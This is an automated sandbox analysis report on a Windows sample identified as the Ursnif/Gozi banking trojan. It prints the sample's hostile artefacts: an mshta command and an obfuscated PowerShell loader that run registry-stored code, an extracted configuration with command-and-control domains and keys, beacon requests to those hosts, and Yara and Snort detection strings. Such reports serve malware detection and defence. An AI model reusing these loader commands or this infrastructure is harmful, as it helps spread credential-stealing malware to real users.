Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
main.exe

Overview

General Information

Sample Name:main.exe
Analysis ID:747122
MD5:9676298f24c8cdd4b532ac027a00f60e
SHA1:8d0bd57712533f1a889627706925c17ed4347ce5
SHA256:0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
Tags:exe
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Machine Learning detection for sample
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • main.exe (PID: 6012 cmdline: C:\Users\user\Desktop\main.exe MD5: 9676298F24C8CDD4B532AC027A00F60E)
  • mshta.exe (PID: 2388 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 2620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "5", "server": "50", "serpent_key": "Qk6vKwBtCjaLJ4zv", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 38 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.main.exe.6d0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0.2.main.exe.cb94a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          0.3.main.exe.14294a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            0.3.main.exe.1455948.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.3.main.exe.13aa4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                Click to see the 3 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.3134.0.118.20349698802033203 11/16/22-02:14:48.026105
                SID:2033203
                Source Port:49698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3134.0.118.20349698802033204 11/16/22-02:14:48.026105
                SID:2033204
                Source Port:49698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: main.exeVirustotal: Detection: 61%Perma Link
                Antivirus / Scanner detection for submitted sample
                Source: main.exeAvira: detected
                Machine Learning detection for sample
                Source: main.exeJoe Sandbox ML: detected
                Source: 0.2.main.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                Source: 0.0.main.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                Source: main.exeMalware Configuration Extractor: Ursnif {"RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "5", "server": "50", "serpent_key": "Qk6vKwBtCjaLJ4zv", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                Source: main.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49698 -> 134.0.118.203:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49698 -> 134.0.118.203:80
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: global trafficHTTP traffic detected: GET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: powershell.exe, 0000000F.00000002.527605554.00000265C03F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT
                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS
                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownDNS traffic detected: queries for: lentaphoto.at
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                Source: global trafficHTTP traffic detected: GET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: main.exe, 00000000.00000002.505909636.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Writes or reads registry keys via WMI
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
